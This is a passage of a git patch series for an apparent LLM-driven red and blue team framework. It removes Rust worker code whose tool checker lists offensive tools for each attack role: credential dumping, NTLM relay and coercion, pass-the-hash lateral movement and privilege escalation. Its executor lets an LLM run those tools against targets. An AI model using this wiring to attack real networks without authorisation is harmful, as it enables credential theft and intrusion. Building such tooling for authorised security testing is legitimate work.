-    }
-    let json_str = serde_json::to_string(&data)?;
-    conn.set_ex::<_, _, ()>(&key, &json_str, TASK_STATUS_TTL as u64)
-        .await?;
-    Ok(())
-}
diff --git a/ares-worker/src/task_loop/types.rs b/ares-worker/src/task_loop/types.rs
deleted file mode 100644
index 4e5282b8..00000000
--- a/ares-worker/src/task_loop/types.rs
+++ /dev/null
@@ -1,180 +0,0 @@
-//! Wire types and agent result structs for the task loop.
-
-use chrono::Utc;
-use serde::{Deserialize, Serialize};
-
-// ─── Agent result types ──────────────────────────────────────────────────────
-
-/// Result from running an agent task.
-#[derive(Debug, Clone)]
-pub struct AgentResult {
-    /// Raw text output from the agent.
-    pub output: String,
-    /// Whether the agent encountered an error.
-    pub error: Option<String>,
-    /// Token usage metrics from the LLM call.
-    pub usage: Option<TokenUsage>,
-    /// Structured discoveries parsed from tool output (hosts, creds, hashes, vulns).
-    pub discoveries: Option<serde_json::Value>,
-}
-
-/// LLM token usage counters.
-#[derive(Debug, Clone, serde::Serialize)]
-pub struct TokenUsage {
-    pub input_tokens: u64,
-    pub output_tokens: u64,
-    pub total_tokens: u64,
-    /// Model name (e.g. "openai/gpt-4.1-mini").
-    #[serde(default, skip_serializing_if = "Option::is_none")]
-    pub model: Option<String>,
-}
-
-// ─── Wire types (match Python's Pydantic models exactly) ─────────────────────
-
-/// Task message from the queue. Matches `TaskMessage` in `task_queue.py`.
-#[derive(Debug, Clone, Serialize, Deserialize)]
-pub struct TaskMessage {
-    pub task_id: String,
-    pub task_type: String,
-    pub source_agent: String,
-    pub target_agent: String,
-    pub payload: serde_json::Value,
-    #[serde(default = "default_priority")]
-    pub priority: i32,
-    pub created_at: Option<String>,
-    pub callback_queue: Option<String>,
-}
-
-fn default_priority() -> i32 {
-    5
-}
-
-/// Task result pushed back to orchestrator. Matches `TaskResult` in `task_queue.py`. 
-#[derive(Debug, Clone, Serialize, Deserialize)]
-pub struct TaskResult {
-    pub task_id: String,
-    pub success: bool,
-    #[serde(skip_serializing_if = "Option::is_none")]
-    pub result: Option<serde_json::Value>,
-    #[serde(skip_serializing_if = "Option::is_none")]
-    pub error: Option<String>,
-    pub completed_at: Option<String>,
-    #[serde(skip_serializing_if = "Option::is_none")]
-    pub worker_pod: Option<String>,
-    #[serde(skip_serializing_if = "Option::is_none")]
-    pub agent_name: Option<String>,
-}
-
-impl TaskResult {
-    pub fn success(
-        task_id: &str,
-        result: serde_json::Value,
-        pod_name: &str,
-        agent_name: &str,
-    ) -> Self {
-        Self {
-            task_id: task_id.to_string(),
-            success: true,
-            result: Some(result),
-            error: None,
-            completed_at: Some(Utc::now().to_rfc3339()),
-            worker_pod: Some(pod_name.to_string()),
-            agent_name: Some(agent_name.to_string()),
-        }
-    }
-
-    pub fn failure(
-        task_id: &str,
-        error: String,
-        result: Option<serde_json::Value>,
-        pod_name: &str,
-        agent_name: &str,
-    ) -> Self {
-        Self {
-            task_id: task_id.to_string(),
-            success: false,
-            result,
-            error: Some(error),
-            completed_at: Some(Utc::now().to_rfc3339()),
-            worker_pod: Some(pod_name.to_string()),
-            agent_name: Some(agent_name.to_string()),
-        }
-    }
-}
-
-#[cfg(test)]
-mod tests {
-    use super::*;
-    use serde_json::json;
-
-    #[test]
-    fn test_task_result_success() {
-        let result = TaskResult::success("task-1", json!({"output": "done"}), "pod-1", "recon");
-        assert!(result.success);
-        assert!(result.error.is_none());
-        assert_eq!(result.task_id, "task-1");
-        assert!(result.result.is_some());
-        assert_eq!(result.worker_pod.as_deref(), Some("pod-1"));
-        assert_eq!(result.agent_name.as_deref(), Some("recon"));
-        assert!(result.completed_at.is_some());
-    }
-
-    #[test]
-    fn test_task_result_failure() {
-        let result = TaskResult::failure(
-            "task-2",
-            "timeout".to_string(),
-            Some(json!({"partial": true})),
-            "pod-1",
-            "lateral",
-        );
-        assert!(!result.success);
-        assert_eq!(result.error.as_deref(), Some("timeout"));
-        assert!(result.result.is_some());
-    }
-
-    #[test]
-    fn test_task_result_failure_no_result() {
-        let result = TaskResult::failure("task-3", "crash".to_string(), None, "pod-1", "recon");
-        assert!(!result.success);
-        assert!(result.result.is_none());
-    }
-
-    #[test]
-    fn test_task_message_deserialize() {
-        let json = json!({
-            "task_id": "t-1",
-            "task_type": "recon",
-            "source_agent": "orchestrator",
-            "target_agent": "recon-1",
-            "payload": {"target_ip": "192.168.58.10"},
-            "priority": 3,
-            "created_at": "2026-04-08T12:00:00Z"
-        });
-        let msg: TaskMessage = serde_json::from_value(json).unwrap();
-        assert_eq!(msg.task_id, "t-1");
-        assert_eq!(msg.task_type, "recon");
-        assert_eq!(msg.priority, 3);
-        assert!(msg.callback_queue.is_none());
-    }
-
-    #[test]
-    fn test_task_message_default_priority() {
-        let json = json!({
-            "task_id": "t-1",
-            "task_type": "recon",
-            "source_agent": "orchestrator",
-            "target_agent": "recon-1",
-            "payload": {}
-        });
-        let msg: TaskMessage = serde_json::from_value(json).unwrap();
-        assert_eq!(msg.priority, 5); // default
-    }
-
-    #[test]
-    fn test_task_result_serialization_skips_none() {
-        let result = TaskResult::success("t-1", json!({"ok": true}), "pod-1", "recon");
-        let serialized = serde_json::to_value(&result).unwrap();
-        assert!(serialized.get("error").is_none());
-    }
-}
diff --git a/ares-worker/src/tool_check.rs b/ares-worker/src/tool_check.rs
deleted file mode 100644
index 52eb9c9b..00000000
--- a/ares-worker/src/tool_check.rs
+++ /dev/null
@@ -1,273 +0,0 @@
-//! Tool availability check at worker startup.
-//!
-//! 
Probes which external binaries are installed so we can log warnings
-//! for missing tools and optionally report the inventory to the orchestrator
-//! via Redis.
-//!
-//! Tool lists are generated at compile time from `tools.yaml` by
-//! `build.rs`. See that file for the authoritative reference of expected
-//! tools per role.
-
-use std::collections::BTreeMap;
-
-use tracing::{info, warn};
-
-// Pull in `WORKER_ROLES` and `tools_for_role()` generated by build.rs
-// from tools.yaml.
-include!(concat!(env!("OUT_DIR"), "/tool_tables.rs"));
-
-/// Check which tools are available in $PATH for the given role.
-///
-/// Returns a map of tool_name → available (true/false).
-/// Logs warnings for missing tools but does not fail.
-pub async fn check_tools(role: &str) -> BTreeMap<String, bool> {
-    let tools = tools_for_role(role);
-    let mut inventory = BTreeMap::new();
-
-    for &tool in tools {
-        let available = is_in_path(tool).await;
-        inventory.insert(tool.to_string(), available);
-    }
-
-    let available: Vec<&str> = inventory
-        .iter()
-        .filter(|(_, &v)| v)
-        .map(|(k, _)| k.as_str())
-        .collect();
-    let missing: Vec<&str> = inventory
-        .iter()
-        .filter(|(_, &v)| !v)
-        .map(|(k, _)| k.as_str())
-        .collect();
-
-    info!(
-        role = role,
-        available_count = available.len(),
-        missing_count = missing.len(),
-        "Tool availability check complete"
-    );
-
-    if !missing.is_empty() {
-        warn!(
-            role = role,
-            missing = ?missing,
-            "Some tools are not installed — tasks requiring them will fail"
-        );
-    }
-
-    inventory
-}
-
-/// Publish tool inventory to Redis so the orchestrator can see what
-/// each worker has available.
-pub async fn publish_inventory(
-    conn: &mut redis::aio::ConnectionManager,
-    agent_name: &str,
-    inventory: &BTreeMap<String, bool>,
-) {
-    use redis::AsyncCommands;
-
-    let key = format!("ares:tools:{agent_name}");
-    let available: Vec<&str> = inventory
-        .iter()
-        .filter(|(_, &v)| v)
-        .map(|(k, _)| k.as_str())
-        .collect();
-
-    match serde_json::to_string(&available) {
-        Ok(json) => {
-            let result: Result<(), _> = conn.set_ex(&key, &json, 3600).await;
-            if let Err(e) = result {
-                warn!("Failed to publish tool inventory: {e}");
-            }
-        }
-        Err(e) => warn!("Failed to serialize tool inventory: {e}"),
-    }
-}
-
-/// Check if a binary is available in PATH using `which`.
-async fn is_in_path(binary: &str) -> bool {
-    tokio::process::Command::new("which")
-        .arg(binary)
-        .stdout(std::process::Stdio::null())
-        .stderr(std::process::Stdio::null())
-        .status()
-        .await
-        .is_ok_and(|s| s.success())
-}
-
-#[cfg(test)]
-mod tests {
-    use super::*;
-
-    /// All known worker roles must have a non-empty tool list.
-    #[test]
-    fn all_roles_have_tools() {
-        for role in WORKER_ROLES {
-            let tools = tools_for_role(role);
-            assert!(!tools.is_empty(), "Role {role} should have tools");
-        }
-    }
-
-    #[test]
-    fn unknown_role_returns_empty() {
-        assert!(tools_for_role("nonexistent").is_empty());
-    }
-
-    /// No duplicate entries within a single role's tool list.
-    #[test]
-    fn no_duplicate_tools_per_role() {
-        for role in WORKER_ROLES {
-            let tools = tools_for_role(role);
-            let mut seen = std::collections::HashSet::new();
-            for tool in tools {
-                assert!(
-                    seen.insert(tool),
-                    "Duplicate tool '{tool}' in role '{role}'"
-                );
-            }
-        }
-    }
-
-    // ---------------------------------------------------------------
-    // Per-role expected tool assertions.
-    //
-    // These validate that tools.yaml contains the expected tools.
-    // When Ansible provisioning changes, update tools.yaml. 
- // --------------------------------------------------------------- - - #[test] - fn recon_has_expected_tools() { - let tools = tools_for_role("recon"); - for expected in &[ - "nmap", - "netexec", - "bloodhound-python", - "ldapsearch", - "enum4linux", - "certipy", - "impacket-GetNPUsers", - "impacket-GetUserSPNs", - ] { - assert!( - tools.contains(expected), - "recon missing expected tool: {expected}" - ); - } - } - - #[test] - fn credential_access_has_expected_tools() { - let tools = tools_for_role("credential_access"); - for expected in &[ - "impacket-GetUserSPNs", - "impacket-GetNPUsers", - "impacket-secretsdump", - "lsassy", - "smbclient", - "gMSADumper", - ] { - assert!( - tools.contains(expected), - "credential_access missing expected tool: {expected}" - ); - } - // netexec is NOT installed on credential_access (only on RECON) - assert!( - !tools.contains(&"netexec"), - "credential_access must NOT have netexec (recon-only)" - ); - } - - #[test] - fn cracker_has_expected_tools() { - let tools = tools_for_role("cracker"); - assert!(tools.contains(&"hashcat")); - assert!(tools.contains(&"john")); - } - - #[test] - fn acl_has_expected_tools() { - let tools = tools_for_role("acl"); - for expected in &["bloodyAD", "pywhisker", "impacket-dacledit", "rpcclient"] { - assert!( - tools.contains(expected), - "acl missing expected tool: {expected}" - ); - } - } - - #[test] - fn privesc_has_expected_tools() { - let tools = tools_for_role("privesc"); - for expected in &[ - "certipy", - "lsassy", - "nopac", - "printnightmare", - "printerbug", - "addspn", - "dnstool", - "impacket-findDelegation", - "impacket-getST", - "impacket-ticketer", - "impacket-secretsdump", - "impacket-psexec", - "KrbRelayUp", - ] { - assert!( - tools.contains(expected), - "privesc missing expected tool: {expected}" - ); - } - } - - #[test] - fn lateral_has_expected_tools() { - let tools = tools_for_role("lateral"); - for expected in &[ - "evil-winrm", - "impacket-psexec", - "impacket-wmiexec", - "impacket-smbexec", - "impacket-secretsdump", - "xfreerdp", - "sshpass", - "proxychains4", - "pth-winexe", - ] { - assert!( - tools.contains(expected), - "lateral missing expected tool: {expected}" - ); - } - } - - #[test] - fn coercion_has_expected_tools() { - let tools = tools_for_role("coercion"); - for expected in &[ - "responder", - "mitm6", - "coercer", - "dfscoerce", - "printerbug", - "addspn", - "dnstool", - "impacket-ntlmrelayx", - ] { - assert!( - tools.contains(expected), - "coercion missing expected tool: {expected}" - ); - } - } - - #[tokio::test] - async fn which_finds_basic_commands() { - // `which` itself should always be available - assert!(is_in_path("which").await); - // A nonsense binary should not be found - assert!(!is_in_path("nonexistent_binary_xyz_12345").await); - } -} diff --git a/ares-worker/src/tool_executor.rs b/ares-worker/src/tool_executor.rs deleted file mode 100644 index 8b45b849..00000000 --- a/ares-worker/src/tool_executor.rs +++ /dev/null @@ -1,452 +0,0 @@ -//! Thin tool executor loop for LLM-driven orchestration. -//! -//! When the Rust orchestrator drives agent loops via `ARES_LLM_MODEL`, it -//! dispatches individual tool calls to `ares:tool_exec:{role}` and waits -//! for results on `ares:tool_results:{call_id}`. -//! -//! This module implements the worker-side consumer: -//! -//! ```text -//! loop { -//! 1. BRPOP from ares:tool_exec:{role} -//! 2. Deserialize ToolExecRequest -//! 3. Execute tool via ares_tools::dispatch() -//! 4. Serialize ToolExecResponse -//! 5. 
LPUSH to ares:tool_results:{call_id}
-//! }
-//! ```
-//!
-
-use std::sync::Arc;
-use std::time::Duration;
-
-use redis::AsyncCommands;
-use serde::{Deserialize, Serialize};
-use tracing::{debug, error, info, warn, Instrument};
-
-use ares_core::telemetry::propagation::set_span_parent;
-use ares_core::telemetry::spans::{trace_discovery, AgentSpanBuilder, SpanKind, Team};
-use ares_core::telemetry::target::{extract_target_info, infer_target_type_from_info};
-
-use crate::config::WorkerConfig;
-use crate::heartbeat::WorkerStatus;
-
-// ─── Redis key prefixes (must match orchestrator's tool_dispatcher.rs) ───────
-
-const TOOL_EXEC_PREFIX: &str = "ares:tool_exec";
-const TOOL_RESULT_PREFIX: &str = "ares:tool_results";
-
-/// TTL for result keys (1 hour) — matches orchestrator's RESULT_TTL_SECS.
-const RESULT_TTL: i64 = 3600;
-
-// ─── Wire types (match orchestrator's tool_dispatcher.rs exactly) ────────────
-
-/// Request from the orchestrator's RedisToolDispatcher.
-#[derive(Debug, Deserialize)]
-struct ToolExecRequest {
-    call_id: String,
-    task_id: String,
-    tool_name: String,
-    arguments: serde_json::Value,
-    /// W3C traceparent header for cross-service span linking.
-    #[serde(default)]
-    traceparent: Option<String>,
-    /// Operation ID for span correlation with dashboards.
-    #[serde(default)]
-    operation_id: Option<String>,
-}
-
-/// Response pushed back to the orchestrator.
-#[derive(Debug, Serialize)]
-struct ToolExecResponse {
-    call_id: String,
-    output: String,
-    error: Option<String>,
-    /// Structured discoveries parsed from the tool output.
-    #[serde(skip_serializing_if = "Option::is_none")]
-    discoveries: Option<serde_json::Value>,
-}
-
-// ─── Tool executor loop ──────────────────────────────────────────────────────
-
-/// Run the tool execution loop until shutdown is signalled.
-///
-/// Consumes individual tool call requests from `ares:tool_exec:{role}` and
-/// dispatches them directly to `ares_tools::dispatch()`. Results are pushed
-/// back to the per-call mailbox `ares:tool_results:{call_id}`.
-pub async fn run_tool_exec_loop(
-    config: &WorkerConfig,
-    conn: redis::aio::ConnectionManager,
-    status_tx: tokio::sync::watch::Sender<WorkerStatus>,
-    shutdown: Arc<tokio::sync::Notify>,
-) -> anyhow::Result<()> {
-    let queue_key = format!("{TOOL_EXEC_PREFIX}:{}", config.worker_role);
-    info!(
-        queue = %queue_key,
-        agent = %config.agent_name,
-        "Starting tool executor loop"
-    );
-
-    let mut conn = conn;
-
-    // Track tools that failed with "not installed" so we can short-circuit
-    // future calls immediately without attempting to spawn the binary.
-    let mut unavailable_tools: std::collections::HashSet<String> = std::collections::HashSet::new();
-
-    // Exponential backoff state for connection errors
-    let mut retry_delay = Duration::from_secs(1);
-    let max_retry_delay = Duration::from_secs(60);
-
-    loop {
-        // Check for shutdown via select with zero-timeout
-        let poll_result = tokio::select! 
{
-            result = poll_tool_request(&mut conn, &queue_key, config.poll_timeout) => result,
-            _ = shutdown.notified() => {
-                info!("Tool executor: shutdown signalled, finishing");
-                return Ok(());
-            }
-        };
-
-        match poll_result {
-            Ok(Some(request)) => {
-                retry_delay = Duration::from_secs(1);
-
-                // Update heartbeat to busy
-                let _ = status_tx.send(WorkerStatus {
-                    status: "busy".to_string(),
-                    current_task: Some(format!("{}:{}", request.tool_name, request.call_id)),
-                });
-
-                let ti = extract_target_info(&request.arguments);
-                let tt = infer_target_type_from_info(&ti);
-                let mut span_builder =
-                    AgentSpanBuilder::new("tool_exec", &config.worker_role, Team::Red)
-                        .tool(&request.tool_name)
-                        .kind(SpanKind::Consumer);
-                if let Some(ref ip) = ti.target_ip {
-                    span_builder = span_builder.target_ip(ip);
-                }
-                if let Some(ref fqdn) = ti.target_fqdn {
-                    span_builder = span_builder.target_fqdn(fqdn);
-                }
-                if let Some(ref user) = ti.target_user {
-                    span_builder = span_builder.target_user(user);
-                }
-                if let Some(target_type) = tt {
-                    span_builder = span_builder.target_type(target_type);
-                }
-                if let Some(ref op) = request.operation_id {
-                    span_builder = span_builder.operation_id(op);
-                }
-                let exec_span = span_builder.build();
-                if let Some(ref tp) = request.traceparent {
-                    set_span_parent(&exec_span, tp);
-                }
-                execute_and_respond(&mut conn, &request, &mut unavailable_tools)
-                    .instrument(exec_span)
-                    .await;
-
-                // Back to idle
-                let _ = status_tx.send(WorkerStatus {
-                    status: "idle".to_string(),
-                    current_task: None,
-                });
-            }
-            Ok(None) => {
-                // BRPOP timeout, no request — just loop
-                retry_delay = Duration::from_secs(1);
-            }
-            Err(e) => {
-                let error_str = e.to_string().to_lowercase();
-                let is_conn_error = [
-                    "connection",
-                    "connect",
-                    "closed",
-                    "timeout",
-                    "broken pipe",
-                    "reset",
-                ]
-                .iter()
-                .any(|kw| error_str.contains(kw));
-
-                if is_conn_error {
-                    // ConnectionManager auto-reconnects; just back off before retrying
-                    warn!(
-                        delay_secs = retry_delay.as_secs(),
-                        "Tool executor: connection error, retrying: {e}"
-                    );
-                    tokio::select! {
-                        _ = tokio::time::sleep(retry_delay) => {}
-                        _ = shutdown.notified() => return Ok(()),
-                    }
-                    retry_delay = (retry_delay * 2).min(max_retry_delay);
-                } else {
-                    error!("Tool executor: non-connection error: {e}");
-                    tokio::select! {
-                        _ = tokio::time::sleep(Duration::from_secs(5)) => {}
-                        _ = shutdown.notified() => return Ok(()),
-                    }
-                    retry_delay = Duration::from_secs(1);
-                }
-            }
-        }
-    }
-}
-
-/// BRPOP a single tool execution request from the queue.
-async fn poll_tool_request(
-    conn: &mut redis::aio::ConnectionManager,
-    queue_key: &str,
-    timeout: Duration,
-) -> anyhow::Result<Option<ToolExecRequest>> {
-    let result: Option<(String, String)> = redis::cmd("BRPOP")
-        .arg(queue_key)
-        .arg(timeout.as_secs() as i64)
-        .query_async(conn)
-        .await?;
-
-    match result {
-        Some((_key, data)) => {
-            let request: ToolExecRequest = serde_json::from_str(&data)?;
-            debug!(
-                tool = %request.tool_name,
-                call_id = %request.call_id,
-                task_id = %request.task_id,
-                "Received tool exec request"
-            );
-            Ok(Some(request))
-        }
-        None => Ok(None),
-    }
-}
-
-/// Execute a tool call and push the result to Redis.
-///
-/// If the tool has previously failed with "not installed", short-circuits
-/// immediately without attempting to spawn the binary. 
-async fn execute_and_respond(
-    conn: &mut redis::aio::ConnectionManager,
-    request: &ToolExecRequest,
-    unavailable_tools: &mut std::collections::HashSet<String>,
-) {
-    // Short-circuit if this tool is known to be unavailable
-    if unavailable_tools.contains(&request.tool_name) {
-        debug!(
-            tool = %request.tool_name,
-            call_id = %request.call_id,
-            "Skipping unavailable tool (previously failed to spawn)"
-        );
-        let response = ToolExecResponse {
-            call_id: request.call_id.clone(),
-            output: String::new(),
-            error: Some(format!(
-                "Tool '{}' is not installed on this worker. \
-                 Do not call this tool again — it failed to spawn previously.",
-                request.tool_name
-            )),
-            discoveries: None,
-        };
-        let result_key = format!("{TOOL_RESULT_PREFIX}:{}", request.call_id);
-        if let Ok(json) = serde_json::to_string(&response) {
-            let _ = push_result(conn, &result_key, &json).await;
-        }
-        return;
-    }
-
-    info!(
-        tool = %request.tool_name,
-        call_id = %request.call_id,
-        task_id = %request.task_id,
-        "Executing tool"
-    );
-
-    let di = extract_target_info(&request.arguments);
-    let dt = infer_target_type_from_info(&di);
-
-    let response = match ares_tools::dispatch(&request.tool_name, &request.arguments).await {
-        Ok(output) => {
-            // Raw output for structured parsers (need unfiltered data)
-            let raw = output.combined_raw();
-            // Filtered output for LLM (strips MOTD, noise, etc.)
-            let combined = output.combined();
-            let error = if output.success {
-                None
-            } else {
-                Some(format!("tool exited with code {:?}", output.exit_code))
-            };
-
-            // Parse structured discoveries from raw (unfiltered) tool output
-            let discoveries = ares_tools::parsers::parse_tool_output(
-                &request.tool_name,
-                &raw,
-                &request.arguments,
-            );
-            let discoveries = if discoveries.as_object().is_none_or(|o| o.is_empty()) {
-                None
-            } else {
-                Some(discoveries)
-            };
-
-            // Emit discovery spans for observability
-            if let Some(ref disc) = discoveries {
-                if let Some(obj) = disc.as_object() {
-                    for (disc_type, items) in obj {
-                        let count = items.as_array().map(|a| a.len()).unwrap_or(0);
-                        if count > 0 {
-                            let span = trace_discovery(
-                                disc_type,
-                                &request.tool_name,
-                                di.target_user.as_deref(),
-                                None,
-                                di.target_ip.as_deref(),
-                                di.target_fqdn.as_deref(),
-                                dt,
-                                request.operation_id.as_deref(),
-                            );
-                            let _guard = span.enter();
-                        }
-                    }
-                }
-            }
-
-            ToolExecResponse {
-                call_id: request.call_id.clone(),
-                output: combined,
-                error,
-                discoveries,
-            }
-        }
-        Err(e) => {
-            let err_str = e.to_string();
-            // Track tools that fail because the binary is missing
-            if err_str.contains("failed to spawn") || err_str.contains("not installed") {
-                warn!(
-                    tool = %request.tool_name,
-                    "Tool binary not found — marking as unavailable for this session"
-                );
-                unavailable_tools.insert(request.tool_name.clone());
-            }
-            warn!(
-                tool = %request.tool_name,
-                call_id = %request.call_id,
-                err = %e,
-                "Tool execution failed"
-            );
-            ToolExecResponse {
-                call_id: request.call_id.clone(),
-                output: String::new(),
-                error: Some(err_str),
-                discoveries: None,
-            }
-        }
-    };
-
-    let has_error = response.error.is_some();
-    let result_key = format!("{TOOL_RESULT_PREFIX}:{}", request.call_id);
-
-    match serde_json::to_string(&response) {
-        Ok(json) => {
-            if let Err(e) = push_result(conn, &result_key, &json).await {
-                error!(
-                    call_id = %request.call_id,
-                    "Failed to push tool result: {e}"
-                );
-            } else {
-                debug!(
-                    tool = %request.tool_name,
-                    call_id = %request.call_id,
-                    has_error = has_error,
-                    "Tool result pushed"
-                );
-            }
-        }
-        Err(e) => {
-            error!(
-                call_id = 
%request.call_id, - "Failed to serialize tool result: {e}" - ); - } - } -} - -/// LPUSH result and set TTL. -async fn push_result( - conn: &mut redis::aio::ConnectionManager, - result_key: &str, - result_json: &str, -) -> anyhow::Result<()> { - conn.lpush::<_, _, ()>(result_key, result_json).await?; - conn.expire::<_, ()>(result_key, RESULT_TTL).await?; - Ok(()) -} - -// ─── Tests ────────────────────────────────────────────────────────────────── - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn tool_exec_request_deserialize() { - let json = r#"{ - "call_id": "nmap_scan_abc123", - "task_id": "recon_def456", - "tool_name": "nmap_scan", - "arguments": {"target": "192.168.58.0/24"} - }"#; - let req: ToolExecRequest = serde_json::from_str(json).unwrap(); - assert_eq!(req.call_id, "nmap_scan_abc123"); - assert_eq!(req.tool_name, "nmap_scan"); - assert_eq!(req.task_id, "recon_def456"); - } - - #[test] - fn tool_exec_response_serialize() { - let resp = ToolExecResponse { - call_id: "nmap_scan_abc123".into(), - output: "Found 5 hosts".into(), - error: None, - discoveries: None, - }; - let json = serde_json::to_string(&resp).unwrap(); - assert!(json.contains("nmap_scan_abc123")); - assert!(json.contains("Found 5 hosts")); - // discoveries omitted when None - assert!(!json.contains("discoveries")); - } - - #[test] - fn tool_exec_response_with_error() { - let resp = ToolExecResponse { - call_id: "x".into(), - output: String::new(), - error: Some("Connection refused".into()), - discoveries: None, - }; - let json = serde_json::to_string(&resp).unwrap(); - let parsed: serde_json::Value = serde_json::from_str(&json).unwrap(); - assert_eq!(parsed["error"], "Connection refused"); - } - - #[test] - fn tool_exec_response_with_discoveries() { - let resp = ToolExecResponse { - call_id: "nmap_abc".into(), - output: "scan output".into(), - error: None, - discoveries: Some(serde_json::json!({ - "hosts": [{"ip": "192.168.58.10", "services": ["445/tcp"]}] - })), - }; - let json = serde_json::to_string(&resp).unwrap(); - assert!(json.contains("discoveries")); - assert!(json.contains("192.168.58.10")); - } - - #[test] - fn redis_key_prefixes_match_orchestrator() { - // These must match tool_dispatcher.rs in ares-orchestrator - assert_eq!(TOOL_EXEC_PREFIX, "ares:tool_exec"); - assert_eq!(TOOL_RESULT_PREFIX, "ares:tool_results"); - } -} From 99aa1a4d19b08de842edfdf5ae17431acfe0705e Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 17 Apr 2026 11:12:20 -0600 Subject: [PATCH 06/10] fix: correct ares worker binary usage and service invocation **Changed:** - Updated the default value of `redis_ares_worker_binary` to `/usr/local/bin/ares` in both documentation and defaults to remove the hardcoded `worker` argument - Modified `ares-worker@.service.j2` template to append `worker` to the `ExecStart` command, ensuring the service runs the correct subcommand --- ansible/roles/redis/README.md | 2 +- ansible/roles/redis/defaults/main.yml | 2 +- ansible/roles/redis/templates/ares-worker@.service.j2 | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ansible/roles/redis/README.md b/ansible/roles/redis/README.md index 72e36f61..66a15b95 100644 --- a/ansible/roles/redis/README.md +++ b/ansible/roles/redis/README.md @@ -21,7 +21,7 @@ Redis server for Ares worker message broker | `redis_maxmemory` | str | 256mb | No description | | `redis_maxmemory_policy` | str | allkeys-lru | No description | | `redis_install_ares_worker_unit` | bool | True | No description | -| `redis_ares_worker_binary` | str | 
/usr/local/bin/ares worker | No description |
+| `redis_ares_worker_binary` | str | /usr/local/bin/ares | No description |
 | `redis_ares_log_dir` | str | /var/log/ares | No description |
 | `redis_ares_config_dir` | str | /etc/ares | No description |
 | `redis_verify_install` | bool | False | No description |
diff --git a/ansible/roles/redis/defaults/main.yml b/ansible/roles/redis/defaults/main.yml
index 1280c507..ef75c6ae 100644
--- a/ansible/roles/redis/defaults/main.yml
+++ b/ansible/roles/redis/defaults/main.yml
@@ -7,7 +7,7 @@ redis_maxmemory_policy: "allkeys-lru"
 
 # Ares worker configuration
 redis_install_ares_worker_unit: true
-redis_ares_worker_binary: "/usr/local/bin/ares worker"
+redis_ares_worker_binary: "/usr/local/bin/ares"
 redis_ares_log_dir: "/var/log/ares"
 redis_ares_config_dir: "/etc/ares"
 
diff --git a/ansible/roles/redis/templates/ares-worker@.service.j2 b/ansible/roles/redis/templates/ares-worker@.service.j2
index 61c57474..bc4f23c6 100644
--- a/ansible/roles/redis/templates/ares-worker@.service.j2
+++ b/ansible/roles/redis/templates/ares-worker@.service.j2
@@ -5,7 +5,7 @@ Wants=redis.service
 
 [Service]
 Type=simple
-ExecStart={{ redis_ares_worker_binary }}
+ExecStart={{ redis_ares_worker_binary }} worker
 Environment=ARES_REDIS_URL=redis://{{ redis_bind_address }}:{{ redis_port }}
 Environment=ARES_WORKER_ROLE=%i
 Environment=ARES_WORKER_MODE=tool_exec

From bb64e0021f62a84d19a7b3f6924e15d42e56e415 Mon Sep 17 00:00:00 2001
From: Jayson Grace
Date: Fri, 17 Apr 2026 12:25:02 -0600
Subject: [PATCH 07/10] fix: increase blue team investigation timeouts and update report structure

**Changed:**

- Increased the investigation run timeout from 15 to 45 minutes and the stale threshold from 15 to 50 minutes to accommodate longer-running blue team queries and reduce premature termination - `blue/runner.rs`, `completion.rs`
- Increased the blue tool execution timeout from 120s to 600s to match the worst-case query duration with retries and concurrency - `blue/sub_agent.rs`
- Moved investigation reports into "blue/investigations" subdirectories for better organization, and dropped the redundant "_report" suffix from report filenames - `blue/investigation.rs`
- Increased the blue team completion wait deadline from 20 to 45 minutes to align with the increased investigation timeouts and avoid early shutdown - `completion.rs`
- Updated a code comment in the tool executor tests to reference the correct dispatcher path after the module move - `worker/tool_executor.rs`

**Removed:**

- Removed `ares-orchestrator/` and `ares-worker/` from the EC2 build source tarball to streamline build packaging and avoid shipping unnecessary files - `.taskfiles/ec2/Taskfile.yaml`
---
 .taskfiles/ec2/Taskfile.yaml                    |  2 +-
 ares-cli/src/orchestrator/blue/investigation.rs |  6 ++++--
 ares-cli/src/orchestrator/blue/runner.rs        | 10 ++++++----
 ares-cli/src/orchestrator/blue/sub_agent.rs     |  4 +++-
 ares-cli/src/orchestrator/completion.rs         |  6 +++---
 ares-cli/src/worker/tool_executor.rs            |  2 +-
 6 files changed, 18 insertions(+), 12 deletions(-)

diff --git a/.taskfiles/ec2/Taskfile.yaml b/.taskfiles/ec2/Taskfile.yaml
index 4e0e6ca1..19527e62 100644
--- a/.taskfiles/ec2/Taskfile.yaml
+++ b/.taskfiles/ec2/Taskfile.yaml
@@ -137,7 +137,7 @@ tasks:
           trap "rm -f $SRC_TAR" EXIT
           tar -czf "$SRC_TAR" \
             --exclude='target' --exclude='.git' --exclude='*.o' --exclude='*.d' \
-            -C "$(pwd)" Cargo.toml Cargo.lock Cross.toml tools.yaml .cargo/ ares-core/ ares-cli/ ares-llm/ ares-orchestrator/ ares-tools/ ares-worker/
+            -C "$(pwd)" Cargo.toml Cargo.lock 
Cross.toml tools.yaml .cargo/ ares-core/ ares-cli/ ares-llm/ ares-tools/ # Upload source to S3 echo -e "{{.INFO}} Uploading source to S3..." diff --git a/ares-cli/src/orchestrator/blue/investigation.rs b/ares-cli/src/orchestrator/blue/investigation.rs index d9583757..fd605ba6 100644 --- a/ares-cli/src/orchestrator/blue/investigation.rs +++ b/ares-cli/src/orchestrator/blue/investigation.rs @@ -337,7 +337,9 @@ pub(super) async fn generate_report( } }; - let reports_dir = resolve_report_dir(report_dir); + let reports_dir = resolve_report_dir(report_dir) + .join("blue") + .join("investigations"); if let Err(e) = std::fs::create_dir_all(&reports_dir) { warn!( @@ -347,7 +349,7 @@ pub(super) async fn generate_report( return; } - let report_path = reports_dir.join(format!("{investigation_id}_report.md")); + let report_path = reports_dir.join(format!("{investigation_id}.md")); match std::fs::write(&report_path, &report) { Ok(()) => { info!( diff --git a/ares-cli/src/orchestrator/blue/runner.rs b/ares-cli/src/orchestrator/blue/runner.rs index 47f1763a..33181f57 100644 --- a/ares-cli/src/orchestrator/blue/runner.rs +++ b/ares-cli/src/orchestrator/blue/runner.rs @@ -16,11 +16,13 @@ use ares_llm::{LlmProvider, ToolDispatcher}; use super::investigation::{self, Investigation}; -/// Timeout for a single investigation run (15 minutes). -const INVESTIGATION_TIMEOUT_SECS: u64 = 900; +/// Timeout for a single investigation run (45 minutes). +/// Loki queries via the Grafana proxy take 30-40s each from EC2, +/// so the agent needs more headroom to complete triage + hunting. +const INVESTIGATION_TIMEOUT_SECS: 